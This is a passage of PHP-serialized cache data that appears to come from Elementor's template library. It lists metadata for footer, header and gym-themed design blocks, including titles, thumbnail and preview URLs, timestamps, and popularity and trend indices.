011\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.4.jpg\";s:12:\"tmpl_created\";i:1524582631;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/footer-011/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:310;s:16:\"popularity_index\";i:244;s:11:\"trend_index\";i:203;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:580;a:20:{s:4:\"tmpl\";i:645;s:2:\"id\";i:7959;s:5:\"title\";s:10:\"footer 012\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.3.jpg\";s:12:\"tmpl_created\";i:1524582605;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/footer-012/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:311;s:16:\"popularity_index\";i:177;s:11:\"trend_index\";i:140;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:581;a:20:{s:4:\"tmpl\";i:644;s:2:\"id\";i:7982;s:5:\"title\";s:10:\"footer 013\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.2.jpg\";s:12:\"tmpl_created\";i:1524582468;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/footer-013/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:314;s:16:\"popularity_index\";i:209;s:11:\"trend_index\";i:212;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:582;a:20:{s:4:\"tmpl\";i:643;s:2:\"id\";i:7997;s:5:\"title\";s:10:\"footer 014\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.1.jpg\";s:12:\"tmpl_created\";i:1524582343;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/footer-014/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:316;s:16:\"popularity_index\";i:64;s:11:\"trend_index\";i:41;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:583;a:20:{s:4:\"tmpl\";i:693;s:2:\"id\";i:9119;s:5:\"title\";s:10:\"footer 015\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2018/07/Footer_GetStarted_350.png\";s:12:\"tmpl_created\";i:1532428138;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/blocks/demo/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:317;s:16:\"popularity_index\";i:240;s:11:\"trend_index\";i:154;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:584;a:20:{s:4:\"tmpl\";i:652;s:2:\"id\";i:7852;s:5:\"title\";s:9:\"footer 02\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.13.jpg\";s:12:\"tmpl_created\";i:1524582875;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/footer-02/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:320;s:16:\"popularity_index\";i:199;s:11:\"trend_index\";i:96;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:585;a:20:{s:4:\"tmpl\";i:653;s:2:\"id\";i:7862;s:5:\"title\";s:9:\"footer 03\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.12.jpg\";s:12:\"tmpl_created\";i:1524582903;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/footer-03/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:321;s:16:\"popularity_index\";i:137;s:11:\"trend_index\";i:91;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:586;a:20:{s:4:\"tmpl\";i:654;s:2:\"id\";i:7871;s:5:\"title\";s:9:\"footer 04\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.11.jpg\";s:12:\"tmpl_created\";i:1524582927;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/footer-04/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:323;s:16:\"popularity_index\";i:97;s:11:\"trend_index\";i:55;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:587;a:20:{s:4:\"tmpl\";i:655;s:2:\"id\";i:7884;s:5:\"title\";s:9:\"footer 05\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.10.jpg\";s:12:\"tmpl_created\";i:1524582944;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/footer-05/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:325;s:16:\"popularity_index\";i:92;s:11:\"trend_index\";i:109;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:588;a:20:{s:4:\"tmpl\";i:656;s:2:\"id\";i:7892;s:5:\"title\";s:9:\"footer 06\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.9.jpg\";s:12:\"tmpl_created\";i:1524583015;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/footer-06/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:326;s:16:\"popularity_index\";i:132;s:11:\"trend_index\";i:146;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:589;a:20:{s:4:\"tmpl\";i:650;s:2:\"id\";i:7904;s:5:\"title\";s:9:\"footer 07\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.8.jpg\";s:12:\"tmpl_created\";i:1524582814;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/footer-07/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:328;s:16:\"popularity_index\";i:203;s:11:\"trend_index\";i:186;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:590;a:20:{s:4:\"tmpl\";i:649;s:2:\"id\";i:7917;s:5:\"title\";s:9:\"footer 08\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.7.jpg\";s:12:\"tmpl_created\";i:1524582788;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/footer-08/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:329;s:16:\"popularity_index\";i:89;s:11:\"trend_index\";i:144;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:591;a:20:{s:4:\"tmpl\";i:648;s:2:\"id\";i:7927;s:5:\"title\";s:9:\"footer 09\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.6.jpg\";s:12:\"tmpl_created\";i:1524582691;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/footer-09/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:331;s:16:\"popularity_index\";i:178;s:11:\"trend_index\";i:100;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:592;a:20:{s:4:\"tmpl\";i:642;s:2:\"id\";i:4676;s:5:\"title\";s:8:\"Footer 7\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/03/footer_7.png\";s:12:\"tmpl_created\";i:1522014215;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/footer_7/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:10:\"[\"Footer\"]\";s:10:\"menu_order\";i:338;s:16:\"popularity_index\";i:237;s:11:\"trend_index\";i:346;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:593;a:20:{s:4:\"tmpl\";i:637;s:2:\"id\";i:7627;s:5:\"title\";s:8:\"Footer 8\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/footer_hero_1.png\";s:12:\"tmpl_created\";i:1521547332;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/footer-8/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:10:\"[\"Footer\"]\";s:10:\"menu_order\";i:340;s:16:\"popularity_index\";i:100;s:11:\"trend_index\";i:83;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:594;a:20:{s:4:\"tmpl\";i:638;s:2:\"id\";i:7638;s:5:\"title\";s:8:\"Footer 9\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/footer_hero_2.png\";s:12:\"tmpl_created\";i:1521547502;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/footer-9/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:10:\"[\"Footer\"]\";s:10:\"menu_order\";i:342;s:16:\"popularity_index\";i:124;s:11:\"trend_index\";i:147;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:595;a:20:{s:4:\"tmpl\";i:888;s:2:\"id\";i:11424;s:5:\"title\";s:3:\"GYM\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2019/08/404_Small.png\";s:12:\"tmpl_created\";i:1567393309;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/gym-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:13:\"[\"404\",\"Gym\"]\";s:10:\"menu_order\";i:344;s:16:\"popularity_index\";i:679;s:11:\"trend_index\";i:769;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:596;a:20:{s:4:\"tmpl\";i:887;s:2:\"id\";i:11435;s:5:\"title\";s:3:\"GYM\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2019/08/Archiv_Small.png\";s:12:\"tmpl_created\";i:1567393296;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/gym-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:7:\"[\"Gym\"]\";s:10:\"menu_order\";i:346;s:16:\"popularity_index\";i:441;s:11:\"trend_index\";i:507;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:597;a:20:{s:4:\"tmpl\";i:886;s:2:\"id\";i:11445;s:5:\"title\";s:3:\"GYM\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2019/08/Post_Small.png\";s:12:\"tmpl_created\";i:1567393229;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/gym-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:7:\"[\"Gym\"]\";s:10:\"menu_order\";i:349;s:16:\"popularity_index\";i:452;s:11:\"trend_index\";i:479;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:598;a:20:{s:4:\"tmpl\";i:885;s:2:\"id\";i:11453;s:5:\"title\";s:3:\"GYM\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2019/08/Footer_Small.png\";s:12:\"tmpl_created\";i:1567393224;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/gym-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:16:\"[\"Footer\",\"Gym\"]\";s:10:\"menu_order\";i:351;s:16:\"popularity_index\";i:270;s:11:\"trend_index\";i:331;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:599;a:20:{s:4:\"tmpl\";i:884;s:2:\"id\";i:11461;s:5:\"title\";s:3:\"GYM\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2020/06/Header-gym-and-fitness.png\";s:12:\"tmpl_created\";i:1567393219;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/blocks/gym/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:16:\"[\"Gym\",\"Header\"]\";s:10:\"menu_order\";i:352;s:16:\"popularity_index\";i:201;s:11:\"trend_index\";i:135;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:600;a:20:{s:4:\"tmpl\";i:635;s:2:\"id\";i:7596;s:5:\"title\";s:8:\"Header 1\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.12.jpg\";s:12:\"tmpl_created\";i:1521546999;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/header-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:10:\"[\"Header\"]\";s:10:\"menu_order\";i:354;s:16:\"popularity_index\";i:33;s:11:\"trend_index\";i:17;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:601;a:20:{s:4:\"tmpl\";i:663;s:2:\"id\";i:7801;s:5:\"title\";s:9:\"header 10\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.9.jpg\";s:12:\"tmpl_created\";i:1524583659;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/header-10/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:356;s:16:\"popularity_index\";i:51;s:11:\"trend_index\";i:14;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:602;a:20:{s:4:\"tmpl\";i:658;s:2:\"id\";i:7812;s:5:\"title\";s:9:\"header 11\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.10.jpg\";s:12:\"tmpl_created\";i:1524583298;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/header-11/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:358;s:16:\"popularity_index\";i:96;s:11:\"trend_index\";i:103;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:603;a:20:{s:4:\"tmpl\";i:657;s:2:\"id\";i:7825;s:5:\"title\";s:9:\"header 12\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.11.jpg\";s:12:\"tmpl_created\";i:1524583273;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/header-12/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:360;s:16:\"popularity_index\";i:63;s:11:\"trend_index\";i:75;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:604;a:20:{s:4:\"tmpl\";i:694;s:2:\"id\";i:9127;s:5:\"title\";s:9:\"header 13\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2018/07/Header_get_started_1200V3.png\";s:12:\"tmpl_created\";i:1532428699;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/header-13/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:362;s:16:\"popularity_index\";i:61;s:11:\"trend_index\";i:58;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:605;a:20:{s:4:\"tmpl\";i:636;s:2:\"id\";i:7615;s:5:\"title\";s:8:\"Header 2\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.1.jpg\";s:12:\"tmpl_created\";i:1521547237;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/header-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:10:\"[\"Header\"]\";s:10:\"menu_order\";i:365;s:16:\"popularity_index\";i:30;s:11:\"trend_index\";i:33;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:606;a:20:{s:4:\"tmpl\";i:665;s:2:\"id\";i:7713;s:5:\"title\";s:8:\"header 3\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.2.jpg\";s:12:\"tmpl_created\";i:1524584780;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/header-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:367;s:16:\"popularity_index\";i:43;s:11:\"trend_index\";i:28;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:607;a:20:{s:4:\"tmpl\";i:659;s:2:\"id\";i:7724;s:5:\"title\";s:8:\"header 4\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.3.jpg\";s:12:\"tmpl_created\";i:1524583367;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/header-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:369;s:16:\"popularity_index\";i:24;s:11:\"trend_index\";i:13;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:608;a:20:{s:4:\"tmpl\";i:660;s:2:\"id\";i:7734;s:5:\"title\";s:8:\"header 5\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.4.jpg\";s:12:\"tmpl_created\";i:1524583436;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/header-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:371;s:16:\"popularity_index\";i:36;s:11:\"trend_index\";i:18;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:609;a:20:{s:4:\"tmpl\";i:666;s:2:\"id\";i:7744;s:5:\"title\";s:8:\"Header 6\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.5.jpg\";s:12:\"tmpl_created\";i:1524584784;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/header-6/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:372;s:16:\"popularity_index\";i:65;s:11:\"trend_index\";i:94;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:610;a:20:{s:4:\"tmpl\";i:664;s:2:\"id\";i:7754;s:5:\"title\";s:8:\"header 